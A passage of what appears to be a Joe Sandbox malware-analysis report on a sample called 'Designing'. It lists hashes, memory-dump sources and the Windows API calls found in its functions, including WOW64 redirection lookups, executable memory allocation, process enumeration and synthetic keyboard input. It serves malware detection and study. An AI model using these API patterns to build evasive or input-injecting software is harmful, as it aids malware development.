                                              • Instruction Fuzzy Hash: 4911C472244208BFDF109F64CC45FFB7BE9EFC8B54F114168FA41A6090DAB19811CB20
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B7027A,?), ref: 00BAC6E7
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BAC6F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                              • API String ID: 2574300362-1816364905
                                              • Opcode ID: 6721381b2fbaea8122e5bc5ed44791c1098ffad3278cf610d8057d47858f82ff
                                              • Instruction ID: d6b1680df7344c0f35c4b8246b91797ea838b699dccbfe469c7484076c6ee77e
                                              • Opcode Fuzzy Hash: 6721381b2fbaea8122e5bc5ed44791c1098ffad3278cf610d8057d47858f82ff
                                              • Instruction Fuzzy Hash: CDE0C239224302DFD7206B29CC48F42BAE4FF09314F4084ADE895D3220DB70CC808F10
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B44AF7,?), ref: 00B44BB8
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B44BCA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              • Opcode ID: 6fe78b7b9aa210c1a7baca3ea37b4153b260193709ab08280c3f8a311d115b24
                                              • Instruction ID: fd706848889190c7f637c543e40433d3bcdc5f0f8cc19a12e10aa1a3ba2690e9
                                              • Opcode Fuzzy Hash: 6fe78b7b9aa210c1a7baca3ea37b4153b260193709ab08280c3f8a311d115b24
                                              • Instruction Fuzzy Hash: 92D017B0560712CFD720AF35EC08B06B6E5EF08351F159CAEE496E2564EFB4D990DA50
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B44B44,?,00B449D4,?,?,00B427AF,?,00000001), ref: 00B44B85
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B44B97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: f47ac80b5e2be267e06253fe55fb2dc36d213798d70a3afd132de6c4e547e581
                                              • Instruction ID: 8adf2169ed5438bfaf889964123712fadc5cb07e4a1cef84628286a91ca18b9f
                                              • Opcode Fuzzy Hash: f47ac80b5e2be267e06253fe55fb2dc36d213798d70a3afd132de6c4e547e581
                                              • Instruction Fuzzy Hash: BBD01770520B52CFD720AF35EC18F06B6E4EF08351F1588AEE496F2560EBB0E880DA50
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00BB1696), ref: 00BB1455
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BB1467
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              • Opcode ID: f880d29dae06b581eae74b028fead198d92785be79e74846000dc4760680baf0
                                              • Instruction ID: 2f6ac5414beb23bf179577e6f29a94ca7c7b68fea81e966d389480cb149e7782
                                              • Opcode Fuzzy Hash: f880d29dae06b581eae74b028fead198d92785be79e74846000dc4760680baf0
                                              • Instruction Fuzzy Hash: F9D01230510712CFD7205F75C809656B6D4AF06395F15CC6AA4D6E3260DBB0D8C0CA10
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B45E3D), ref: 00B455FE
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B45610
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              • Opcode ID: af1d6ce811226b404a0a01177dba750d1983c66f0d50765d147a060ca351eca7
                                              • Instruction ID: b87bb74bf35cc30fb9b3a959ae31196235f71c1fcd43dbb5b7722fcb6fcf2a75
                                              • Opcode Fuzzy Hash: af1d6ce811226b404a0a01177dba750d1983c66f0d50765d147a060ca351eca7
                                              • Instruction Fuzzy Hash: FED01274530B12CFD7306F35C808B16B6D4AF04355F15886DE4D5D2161DAB0C480D650
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BA93DE,?,00BC0980), ref: 00BA97D8
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BA97EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              • Opcode ID: 54b02f6f66dbba619c83c1ea21d8d6b57137078084e599d12131c6f6e827dbb5
                                              • Instruction ID: 39f3a57e7ef35cd8627b08462eb6846c78a02f5234527ab4a9051b595f4f6bf7
                                              • Opcode Fuzzy Hash: 54b02f6f66dbba619c83c1ea21d8d6b57137078084e599d12131c6f6e827dbb5
                                              • Instruction Fuzzy Hash: 91D01770524713CFD720AF75D888B06B6E4EF09391F1588AEE496E2260EFB0C880DA21
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aac1768d4a6954f760a616209bc516115cceae93792d14258b52d14b3ed8c30b
                                              • Instruction ID: 1560e3629ceda9d77c6655d2dee6504f88ec5b39cec39a63f38388e3dc65d805
                                              • Opcode Fuzzy Hash: aac1768d4a6954f760a616209bc516115cceae93792d14258b52d14b3ed8c30b
                                              • Instruction Fuzzy Hash: 09C15B75A04216EFCB14EF94C884EAAB7F5FF48714B2185D8E805EB261DB31ED81CB90
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 00BAE7A7
                                              • CharLowerBuffW.USER32(?,?), ref: 00BAE7EA
                                                • Part of subcall function 00BADE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BADEAE
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00BAE9EA
                                              • _memmove.LIBCMT ref: 00BAE9FD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: 5d3a385bbdf22dd4044c3eda2ec1bd675fd4fd2c6a918ec05dde5dced184320e
                                              • Instruction ID: 45bc16136307bfbe2d920ee1cc4bdc859b576c3c57267b9bc530860c464ae4a2
                                              • Opcode Fuzzy Hash: 5d3a385bbdf22dd4044c3eda2ec1bd675fd4fd2c6a918ec05dde5dced184320e
                                              • Instruction Fuzzy Hash: FDC11971A083019FC754DF28C480A6ABBE4FF89714F1489AEF8A99B351D731ED45CB92
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00BA87AD
                                              • CoUninitialize.OLE32 ref: 00BA87B8
                                                • Part of subcall function 00BBDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00BA8A0E,?,00000000), ref: 00BBDF71
                                              • VariantInit.OLEAUT32(?), ref: 00BA87C3
                                              • VariantClear.OLEAUT32(?), ref: 00BA8A94
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: bc706d431e2252e7efc44292da064a7442ef01c4e6cf97c07543458e6ead5b5d
                                              • Instruction ID: a0b6d0480beadc491ff8ce377b5656f1019d06ef0ea3d38a33b3ba0d088b4e59
                                              • Opcode Fuzzy Hash: bc706d431e2252e7efc44292da064a7442ef01c4e6cf97c07543458e6ead5b5d
                                              • Instruction Fuzzy Hash: 84A11575208B019FDB10EF54C481B2AB7E4BF89354F148899F99A9B7A1CB34FD44CB92
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BC3C4C,?), ref: 00B88308
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BC3C4C,?), ref: 00B88320
                                              • CLSIDFromProgID.OLE32(?,?,00000000,00BC0988,000000FF,?,00000000,00000800,00000000,?,00BC3C4C,?), ref: 00B88345
                                              • _memcmp.LIBCMT ref: 00B88366
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: cd7c35cc99e251b7218a5a632cab79d103b1b2625b3c2fc1c24724500e7f1ba8
                                              • Instruction ID: acbf06ba8347392f415d9b1fdbb6f7ecec9b701b178542529e34a573f8831644
                                              • Opcode Fuzzy Hash: cd7c35cc99e251b7218a5a632cab79d103b1b2625b3c2fc1c24724500e7f1ba8
                                              • Instruction Fuzzy Hash: 6F810971A00109EFCB04DF94C984EEEB7F9FF89315F208598E505AB260DB71AE06CB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: be589c3c6874ecc642edcc5fcdd632a2cbb3198683bffac21e3231fa9de691df
                                              • Instruction ID: 94815510ab4e7599670ec45c8bf30254ba9f68a06961e9ddbd95889f6d9d7583
                                              • Opcode Fuzzy Hash: be589c3c6874ecc642edcc5fcdd632a2cbb3198683bffac21e3231fa9de691df
                                              • Instruction Fuzzy Hash: A9519430698B029ADB24BF799895A6DB3E5EF54318F30889FE546C72B1EE30D840CB15
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00BAF526
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00BAF534
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00BAF5F4
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00BAF603
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: e299cab7febbe34621f4629c1c4407a1b3ffa465bb2247b1ece2dcace8e7f75e
                                              • Instruction ID: 03c65b7ef0c51c87dd70d78a2b1992b6ab40b4c03b09532781bab46e5c5a4b10
                                              • Opcode Fuzzy Hash: e299cab7febbe34621f4629c1c4407a1b3ffa465bb2247b1ece2dcace8e7f75e
                                              • Instruction Fuzzy Hash: 5151A071908301AFC310EF24DC86EABB7E8EF99700F10496DF595D7261EB70AA04CB92
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BB9E88
                                              • ScreenToClient.USER32(00000002,00000002), ref: 00BB9EBB
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BB9F28
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: 25d6b487cce634bfc07a03c1ea57bac1543d2efc1fac557b6e89b4b3c0966e44
                                              • Instruction ID: 51ea042855623ce4d8580a6ebd9b1b011cc3d37ef474f2cfc00b2f7e2db922f8
                                              • Opcode Fuzzy Hash: 25d6b487cce634bfc07a03c1ea57bac1543d2efc1fac557b6e89b4b3c0966e44
                                              • Instruction Fuzzy Hash: 7851EA35A00209EFDB14DF54C8849BE7BF6EB44360F2086A9F955DB2A0DB71AD51CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                              • Instruction ID: 7e698d1c86563b2f412c261e4a0391463ce496118bc640972cef98b8c4828b13
                                              • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                              • Instruction Fuzzy Hash: 5B41E6356007069FDF288E69C881BAF77E5EF4036AB2481FDEC5587640D7709DC98B44
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B8A68A
                                              • __itow.LIBCMT ref: 00B8A6BB
                                                • Part of subcall function 00B8A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B8A976
                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B8A724
                                              • __itow.LIBCMT ref: 00B8A77B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow
                                              • String ID:
                                              • API String ID: 3379773720-0
                                              • Opcode ID: 0376db59a31bb30873da81568fd77aadcde726b2b526c229476b894d98916743
                                              • Instruction ID: 9aed19f7dfe89f366928b92db478f6fa4235b43c0daf8abfb0142d6a6d8da1aa
                                              • Opcode Fuzzy Hash: 0376db59a31bb30873da81568fd77aadcde726b2b526c229476b894d98916743
                                              • Instruction Fuzzy Hash: 9E417374A00209ABEF11EF54CC45BEE7BF9EF44750F0404AAF905A3291DB709E85DBA2
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00BA70BC
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA70CC
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BA7130
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA713C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLast$__itow__swprintfsocket
                                              • String ID:
                                              • API String ID: 2214342067-0
                                              APIs
                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00BC0980), ref: 00BA6B92
                                              • _strlen.LIBCMT ref: 00BA6BC4
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B9BEE1
                                              • GetLastError.KERNEL32(?,00000000), ref: 00B9BF07
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B9BF2C
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B9BF58
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BB8F03
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00BBB1D2
                                              • GetWindowRect.USER32(?,?), ref: 00BBB248
                                              • PtInRect.USER32(?,?,00BBC6BC), ref: 00BBB258
                                              • MessageBeep.USER32(00000000), ref: 00BBB2C9
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B91326
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B91342
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B913A8
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B913FA
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              APIs
                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B91465
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B91481
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B914E0
                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B91532
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B6642B
                                              • __isleadbyte_l.LIBCMT ref: 00B66459
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B66487
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B664BD
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00BB553F
                                                • Part of subcall function 00B93B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B93B4E
                                                • Part of subcall function 00B93B34: GetCurrentThreadId.KERNEL32 ref: 00B93B55
                                                • Part of subcall function 00B93B34: AttachThreadInput.USER32(00000000,?,00B955C0), ref: 00B93B5C
                                              • GetCaretPos.USER32(?), ref: 00BB5550
                                              • ClientToScreen.USER32(00000000,?), ref: 00BB558B
                                              • GetForegroundWindow.USER32 ref: 00BB5591
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
